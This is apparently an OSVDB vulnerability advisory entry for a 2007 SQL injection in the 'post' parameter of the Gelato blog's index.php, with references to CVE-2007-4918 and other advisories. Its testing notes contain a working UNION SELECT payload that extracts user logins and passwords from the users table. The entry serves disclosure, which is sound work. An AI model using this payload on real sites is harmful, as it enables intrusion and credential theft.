Gelato index.php post Variable SQL Injection

2007-09-14T00:00:00
ID OSVDB:37087
Type osvdb
Reporter OSVDB
Modified 2007-09-14T00:00:00

Description

Manual Testing Notes

"/index.php?post=-1//union//select//1,concat(0x7330633a3a,login,0x3a3a,password,0x3a3a),null,null,null,null,null//from/*/".$prefix."users/

References:

Secunia Advisory ID:26785 Other Advisory URL: http://milw0rm.com/exploits/4410 Other Advisory URL: http://securityreason.com/securityalert/3148 ISS X-Force ID: 36617 FrSIRT Advisory: ADV-2007-3179 CVE-2007-4918 Bugtraq ID: 25677